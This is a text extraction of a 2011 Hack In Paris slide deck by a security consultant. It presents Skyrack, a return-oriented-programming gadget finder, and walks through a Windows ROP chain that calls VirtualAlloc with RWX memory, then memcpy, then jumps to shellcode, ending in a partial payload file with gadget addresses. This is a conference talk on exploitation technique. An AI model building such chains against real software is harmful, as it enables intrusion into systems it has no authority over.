60
HERVÉ SCHAUER CONSULTANTS HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Spécialisé sur Unix, Windows, TCP/IP et Internet Hack In Paris 2011 Hack In Paris 2011 Skyrack Skyrack ROP for masses ROP for masses Jean-Baptiste Aviat Jean-Baptiste Aviat <[email protected]>

Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Embed Size (px)

Citation preview

Page 1: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

HERVÉ SCHAUER CONSULTANTSHERVÉ SCHAUER CONSULTANTSCabinet de Consultants en Sécurité Informatique depuis 1989Cabinet de Consultants en Sécurité Informatique depuis 1989Spécialisé sur Unix, Windows, TCP/IP et InternetSpécialisé sur Unix, Windows, TCP/IP et Internet

Hack In Paris 2011Hack In Paris 2011

SkyrackSkyrackROP for massesROP for masses

Jean-Baptiste AviatJean-Baptiste Aviat<[email protected]>

Page 2: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite2/60

Hervé Schauer Consultants

IT security society founded in 1989

Fully independent intellectual expertise services

Free of any distribution, integration, outsourcing, staff delegation or outside investors pressure

Services : consulting, studies, audits, penetration testing, training

Fields of expertise

OS Security : Windows, Unix ,Linux and embedded components

Application security

Network security

Organizational security

Certifications

CISSP, ISO 20000-1 Lead Auditor, ISO 27001 Lead Auditor, ISO 27001 Lead Implementor, ISO 27005 Risk Manager, ITIL, ProCSSI, GIAC GCFA

Page 3: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite3/60

`id`

Jean-Baptiste Aviat

I mostly perform pentests and technical audits

I have been working in HSC for 3 years

Page 4: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite4/60

Agenda

What is ROP already ?

How do we construct a ROP payload ?

What are gadgets ?

Or: why do we need a tool ?

Skyrack basics

Constructing a ROP payload with Skyrack

Practical example

And generating the payload

Generated exploit demonstration

Page 5: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite5/60

What is ROP already ?

Page 6: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite6/60

Buffer overflow little history

In ages...

Free exploitation...

Protection measures:

Stack randomization

Bypass : jmp esp

r.(w^x) memory (ie DEP, NX...)

Bypass : return-into-libc

ASLR

Addresses leak (via other vulnerabilities)

Bruteforce base addresses

Page 7: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite7/60

Return Oriented Programming

return-into-libc allows external libraries functions call

Even chained calls

ROP allows to jump to arbitrary instructions

As long as they are followed by ret like instructions

ret = pop eip

The top of your stack goes into eip

And your stack is freed

If you chain multiple instruction addresses you'll get them executed

Page 8: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite8/60

Gadget use

Saved EIP

Before smashing EIP:

...

0x80041664

0x8004ef02

0x80041664 inc eax0x80041665 ret

0x8004ef02 sal eax, 20x8004ef04 ret

EIP 0x50ff01e0 ret

Vulnerable function:

ESPTop

Bottom

Page 9: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite9/60

...

0x80041664

0x8004ef02

ESP

EIP smashed, first gadget:

0x80041664 inc eax0x80041665 ret

0x8004ef02 sal eax, 20x8004ef04 ret

EIP

0x50ff01e0 ret

Vulnerable function:

Top

Bottom

Page 10: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite10/60

ESP

Pop-ing second gadget address:

0x80041664 inc eax0x80041665 ret

0x8004ef02 sal eax, 20x8004ef04 ret

EIP

0x50ff01e0 ret

Vulnerable function:

...

0x80041664

0x8004ef02

Top

Bottom

Page 11: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite11/60

ESP

Second gadget:

0x80041664 inc eax0x80041665 ret

0x8004ef02 sal eax, 20x8004ef04 ret

EIP

0x50ff01e0 ret

Vulnerable function:

...

0x80041664

0x8004ef02

Top

Bottom

Page 12: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite12/60

ESP

Second gadget returns:

0x80041664 inc eax0x80041665 ret

0x8004ef02 sal eax, 20x8004ef04 retEIP

0x50ff01e0 ret

Vulnerable function:

...

0x80041664

0x8004ef02

Top

Bottom

Page 13: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite13/60

ESP

Second gadget has returned:

0x80041664 inc eax0x80041665 ret

0x8004ef02 sal eax, 20x8004ef04 ret

EIP

0x50ff01e0 ret

Vulnerable function:

0x [...] ...0x [...] ret

...

0x80041664

0x8004ef02

Top

Bottom

Page 14: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite14/60

ROP payload goal

To prepare the execution of a traditional payload:

Allocate some executable memory

Disable NX

Grant executable permissions to some memory mapping

Resolve addresses...

And then to copy or to jump to the payload

Any payload !

Reverse shell

Meterpreter...

Page 15: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite15/60

ROP payload needs

Page 16: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite16/60

Let's build the payload !

All right... how ?

$ objdump -d kernel32.dll | grep -w ret -B 10 …

Quite difficult :)

Some tools:

ROPEME [1] – Linux 32bits only

Immunity:

!find_gadgets.py [2]

Builds a flat gadget.txt file

Quite difficult to parseLimited to Windows 32 bits applications

† pvefindaddr (Peter Van Eeckhoutte) [3]

mona.py (Peter Van Eeckhoutte) [?]

Page 17: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite17/60

mona.py ?

OK, big deal :)

But seriously...

Page 18: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite18/60

Conclusion

fun(Skyrack) > fun(Mona)

Page 19: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite19/60

But, wait... is that really necessary ?

How much gadgets can be found in a library ?

Let's take a look at the 64 bit ELF library libcrypto.so.0.9.8:

→ 6554 ret instructions !

$ sky_build_db -i /lib/libcrypto.so.0.9.8[0x00065798] .init (24 bytes) - executable 1 ret (c3) 0 ret (c2)[0x000657b0] .plt (1712 bytes) - executable 0 ret (c3) 3 ret (c2)[0x00065e80] .text (763784 bytes) - executable 4651 ret (c3) 1898 ret (c2)[0x00120608] .fini (14 bytes) - executable 1 ret (c3) 0 ret (c2)

Page 20: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite20/60

6554 gadgets ?

One ret is at address 0x0f465a

Let's disassemble a few instructions before...

0x0f464c: 0x0f464c 4c8b742448 mov r14, [rsp+48h]0x0f4651 4c8b7c2450 mov r15, [rsp+50h]0x0f4656 4883c458 add rsp, 58h0x0f465a c3 ret

Page 21: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite21/60

6554 gadgets ?

One ret is at address 0x0f465a

Let's disassemble a few instructions before...

0x0f464c:

0x0f464d:

0x0f464c 4c8b742448 mov r14, [rsp+48h]0x0f4651 4c8b7c2450 mov r15, [rsp+50h]0x0f4656 4883c458 add rsp, 58h0x0f465a c3 ret

0x0f464d 8b742448 mov esi, [rsp+48h]0x0f4651 4c8b7c2450 mov r15, [rsp+50h]0x0f4656 4883c458 add rsp, 58h0x0f465a c3 ret

Page 22: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite22/60

6554 gadgets ?

One ret is at address 0x0f465a

Let's disassemble a few instructions before...

0x0f464c:

0x0f464d:

0x0f464f:

0x0f464c 4c8b742448 mov r14, [rsp+48h]0x0f4651 4c8b7c2450 mov r15, [rsp+50h]0x0f4656 4883c458 add rsp, 58h0x0f465a c3 ret

0x0f464d 8b742448 mov esi, [rsp+48h]0x0f4651 4c8b7c2450 mov r15, [rsp+50h]0x0f4656 4883c458 add rsp, 58h0x0f465a c3 ret

0x0f464f 2448 and al, 48h0x0f4651 4c8b7c2450 mov r15, [rsp+50h]0x0f4656 4883c458 add rsp, 58h0x0f465a c3 ret

Page 23: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite23/60

1 ret, 11 gadgets

One ret instruction... many gadgets :)

Here limited to 5 instructions back

→ more if you disassemble further !

Here, 11 gadgets are usable (jl 26h may break execution)

Page 24: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite24/60

The need for a tool

12,25 instructions per ret can be found in average

With a search depth of 5 instructions

6 554 * 12,25 = 80 286,5 gadgets

→ Getting hard to grep !

We do need a tool :)

Page 25: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite25/60

Introducing Skyrack

Based on Metasm (http://metasm.cr0.org)

Allows to disassemble many binaries

Linux: ELF

Windows: PE

Mac OS X: Mach-O fat file

Two CPUs

X86

X86_64

No Power PC !

“Easy” to import new architectures supported by Metasm

Intel syntax

Page 26: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite26/60

Introducing Skyrack: VS Skyrack

Mona:

Automatic payload generation

Win32

Depends on immunity debugger

Adresses specification (ASCII, Unicode....)

Automatic binary and dependencies parsing

Skyrack:

No automatic payload generation – but “conversion”

Windows, Linux, Mac, 32 & 64 bits

Depends on Metasm – pure Ruby → very flexible

Page 27: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite27/60

Introducing Skyrack: path to exploitation

Build a gadget database

$ sky_build_db libcrypto.so.0.9.8

Think about your exploit (I can't help you)

Build your exploit by looking for instructions you need

$ sky_search -a 'mov eax'

Chain the instructions you found

$ sky_search -a 'mov eax' -l 1 >> my_exploit.txt

Generate your exploit

$ sky_generate my_exploit.txt > my_exploit.raw

Done. Get a beer!

Page 28: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite28/60

How to search for instructions ?

Some use cases

Page 29: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite29/60

1 ret, how many gadgets ?

Page 30: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite30/60

Only 2 :)

!

Page 31: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite31/60

Keep only executable branches

Skyrack allows you to keep only executable branches

$ sky_search --preserve-eip

Page 32: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite32/60

Self modifying gadgets

You've been dreaming to add 8 to rax

Maybe in order to point to the next address

You have found the instruction of your dreams

add rax, 8

But the gadget jus't doesn't fit :

Page 33: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite33/60

Self modifying gadgets

Just tell Skyrack to skip gadgets modifying your target:

$ sky_search -a 'add eax' –-preserve-target

Or to skip gadgets modifying a specific register:

$ sky_search -a 'add eax' –-preserve eax

Page 34: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite34/60

Target found... or not.

You need to process the esi register

You can't find no such instructions:

mov eax, esi

xchg eax, esi

You need the following:

push esi, pop reg

Page 35: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite35/60

Precise search

Skyrack allows you to search for consecutive instructions

$ sky_search -a 'pop esi' -a 'push'

Page 36: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite36/60

Specific register search

You need to perform some work on general purpose registers

Adding a specific value to rax

Performing operations between rbx and rcx

Skyrack allows to search only instructions operating on such registers:

$ sky_search -a mov -d regs

Or on a specific register:

$ sky_search -a mov -d rax

Page 37: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite37/60

Converting payloads

The sky_convert functionnality helps you to:

convert a payload written for a specific library to a payload for an other library

In this way, it's easy to convert an exploit

Eg, from libssl0.9.8b → libssl0.9.8c :)

And if you are lucky...

libssl0.9.8b → completely different lib !

$ sky_convert exploit.txt libssl0.9.8b.sqlite3 libssl0.9.8c.sqlite3

Page 38: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite38/60

And finally...

Generate the payload:

$ sky_generate -f libeay32.dll.sqlite3 exploit.txt > win_32_exploit

Just enough !

If you are exploiting local software, the --offset option may allow you to easily brute-force libraries offsets.

$ sky_generate -f libeay32.dll.sqlite3 –-offset 0xfff00012 exploit.txt > win_32_exploit

Page 39: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite39/60

Script it

It's Ruby !

Example in the Interactive Ruby Shell:

$ irb> require 'skyrack/gadget_db'> db = GadgetDb.new('db/pei-x86-64_libeay32.dll.sqlite3')> db.gadget_build 0x1800017f8 => [pop rax, add rsp, 30h, pop r12, ret]> db.search_by_gadget( :any => [['mov [rax]']] ) { |g| puts g }[mov [rax], ecx, add rsp, 38h, ret][mov [rax], rcx, add rsp, 38h, ret][...]

Page 40: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite40/60

Payload generation(or the building part)

Page 41: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite41/60

Typical ROP scheme

Allocate some memory

Make it executable

Copies payload into it

Jump to it

Windows Linux

VirtualAlloc mmap

memcpy memcpy

jmp eax jmp eax

Page 42: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite42/60

Hence we will initiallyput this on the stack:

@after VirtuallAlloc returns

destination

size

Allocation type

Protection: RWX

@after memcpy returns

destination buffer

source buffer = @shell

size

memcpy arguments craft

Call to VirtualAlloc

Call tomemcpy

Unknown values whenwriting payload

shellcode (eg meterpreter)

@arg

@arg+4

@shell

Page 43: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite43/60

Difficulties: arguments for memcpy

Following arguments are unknown:

Destination buffer (our allocated memory)

Source buffer (our shellcode)

Hence we need to:

find where the memory has been allocated

→ VirtualAlloc() or malloc() return value

find the shellcode address

→ we know it's distance from esp (since we craft the stack)

finally, write them on specific places on the stack

Page 44: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite44/60

Assumptions for this demo

Stack grows up

No ASLR (or we can perform brute-force)

We control EIP

We don't care about stack protections, SEHOP...

The payload can contain null bytes

Page 45: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite45/60

Prepare VirtualAlloc call (the easy part)

Craft eip with VirtualAlloc()address

Prepare VirtualAlloc arguments

Argument 1: destination

Argument 2: size

Argument 3: type of allocation

Argument 4: protection

@after VirtuallAlloc returns

destination

size

Allocation type

Protection: RWX

@after memcpy returns

destination buffer

source buffer

size

memcpy arguments craft

shellcode (eg meterpreter)

@arg

@arg+4

@shell

saved address

Page 46: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite46/60

VirtuallAlloc() returns

When VirtualAlloc returns:

ESP goes to it's last argument

EIP receives the saved address

@after VirtuallAlloc returns

destination

size

Allocation type

Protection: RWX

@after memcpy returns

destination buffer

source buffer

size

memcpy arguments craft

shellcode (eg meterpreter)

@arg

@arg+4

@shell

saved address

ESP

Page 47: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite47/60

Finding a ret

A ret address in saved eip willtransfer esp to this block

Finding a ret: no easiest thing :)

$ sky_search -a ret0x6308105f ret

@after VirtuallAlloc returns

destination

size

Allocation type

Protection: RWX

@after memcpy returns

destination buffer

source buffer

size

memcpy arguments craft

shellcode (eg meterpreter)

@arg

@arg+4

@shell

saved address

Page 48: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite48/60

Gadgets block needs

Craft memcpy arguments:

Save eax

Compute memcpy() argumentsaddress (@arg)

Copy saved eax into @arg

Increments @arg of 4

Compute shellcode address (@shell)

Copy @shell into @arg

Call memcpy()

@after VirtuallAlloc returns

destination

size

Allocation type

Protection: RWX

@after memcpy returns

destination buffer

source buffer

size

memcpy arguments craft

shellcode (eg meterpreter)

@arg

@arg+4

@shell

Page 49: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite49/60

@after VirtuallAlloc returns

destination

size

Allocation type

Protection: RWX

@after memcpy returns

destination buffer

source buffer

size

memcpy arguments craft

shellcode (eg meterpreter)

memcpy arguments craft

Page 50: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite50/60

Save eax

$ sky_search -a xchg -s eax0x63087be7 xchg edx, eax ; ret

0x63087be7 xchg edx, eax ; ret

Page 51: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite51/60

Compute memcpy() @arg

Then we need to compute memcpyarguments addresses

→ an incremented value of ESP

Some interesting 'add' are availables:

$ sky_search -a add -d eax,ebx,ecx,edx[...]0x630a4bcf add eax, 8 ; ret0x630a4bfa add eax, 10h ; ret0x630b4dc5 add eax, 40h ; ret

0x63087be7 xchg edx, eax ; ret

Page 52: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite52/60

Compute memcpy() @arg

No add instruction targets esp

We can add 0x40 to eax: we need to copy esp in eax

No mov esp, eax...

Let's use the stack !

$ sky_search -a 'push esp' -a pop0x630f33eb push esp ; pop esi ; pop edi ; ret

$ sky_search -a mov -s esi0x63084fae mov eax, esi ; pop esi ; ret

We need some padding to adjust the stack because of the pop instructions

0x63087be7 xchg edx, eax ; ret0x630f33eb push esp ; pop esi...! [0xffffff01].pack('L')0x63084fae mov eax, esi ; pop esi...! [0xffffff02].pack('L')0x630b4dc5 add eax, 40h ; ret

Page 53: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite53/60

Copy saved eax into @arg

Let's write to [eax]:

$ sky_search -a 'mov [eax]'0x63088aa8 mov [eax], edx ; ret[...]

Remeber: edx holds our eax backup :) !

This is enough to craft memcpy first argument.

0x63087be7 xchg edx, eax ; ret0x630f33eb push esp ; pop esi...! [0xffffff01].pack('L')0x63084fae mov eax, esi ; pop esi...! [0xffffff02].pack('L')0x630b4dc5 add eax, 40h ; ret0x63088aa8 mov [eax], edx ; ret

Page 54: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite54/60

Increments @arg

We then need to add 4 to eax to point itto the next memcpy argument

We don't have add eax, 4 instruction

But...

$ sky_search -a 'inc eax'[…]0x630cbb15 inc eax ; inc eax ; ret

Chaining this gadget twicewill add 4 to eax

0x63087be7 xchg edx, eax ; ret0x630f33eb push esp ; pop esi...! [0xffffff01].pack('L')0x63084fae mov eax, esi ; pop esi...! [0xffffff02].pack('L')0x630b4dc5 add eax, 40h ; ret0x63088aa8 mov [eax], edx ; ret0x630cbb15 inc eax ; inc eax ; ret0x630cbb15 inc eax ; inc eax ; ret

Page 55: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite55/60

Finish... and jump to the payload

The following is about the same:

Incrementing a saved esp to get it to point to our shellcode base addr

And then pop enough bytes from stack to get to memcpy addr

memcpy return value should be our copied shellcode address

Luckily memcpy returns the address of the written area

→ jmp eax could do the job !

$ sky_search_raw -i "jmp eax" binaries/libeay32.dll0x6308fda7 jmp eax

Page 56: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite56/60

Full exploit... partial example

The completed payload.txt file looks like:

! 'A' * 62 # padd to get to EIP

0x77E645A9 @VirtualAlloc # @VirtualAlloc -> EIP

0x6308105f [ret] # address executed when VirtualAlloc returns

! [00].pack('L') # Address = Null! [0x513e].pack('L') # Size! [0x1000].pack('L') # AllocationType = MEM_COMMIT! [ 0x40].pack('L') # Protect = PAGE_EXECUTE_READWRITE

# save eax :0x63087be7 [xchg edx, eax ; ret]

# save esp and pad:0x630f33eb [push esp ; pop esi ; pop edi ; ret]! [0xffffff01].pack('L') 0x63084fae [mov eax, esi ; pop esi ; ret]! [0xffffff02].pack('L')

0x630b4dc5 [add eax, 40h ; ret] # shift eax to the desired value

! 'A' * 62 # padd to get to EIP

0x77E645A9 @VirtualAlloc # @VirtualAlloc -> EIP

0x6308105f [ret] # address executed when VirtualAlloc returns

! [00].pack('L') # Address = Null! [0x513e].pack('L') # Size! [0x1000].pack('L') # AllocationType = MEM_COMMIT! [ 0x40].pack('L') # Protect = PAGE_EXECUTE_READWRITE

# save eax :0x63087be7 [xchg edx, eax ; ret]

# save esp and pad:0x630f33eb [push esp ; pop esi ; pop edi ; ret]! [0xffffff01].pack('L') 0x63084fae [mov eax, esi ; pop esi ; ret]! [0xffffff02].pack('L')

0x630b4dc5 [add eax, 40h ; ret] # shift eax to the desired value

Page 57: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite57/60

Payload file entries

Gadgets addresses:0x63087be7 [xchg edx, eax ; ret]

Ruby code (to write padding, compute things):! 'A' * 62 # padd to get to EIP

Comments:# save eax

This allows to write comprehensible and portable exploit files

Page 58: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite58/60

Generate:

$ sky_generate my_exploit.txt > my_exploit.raw

And run !

Demo

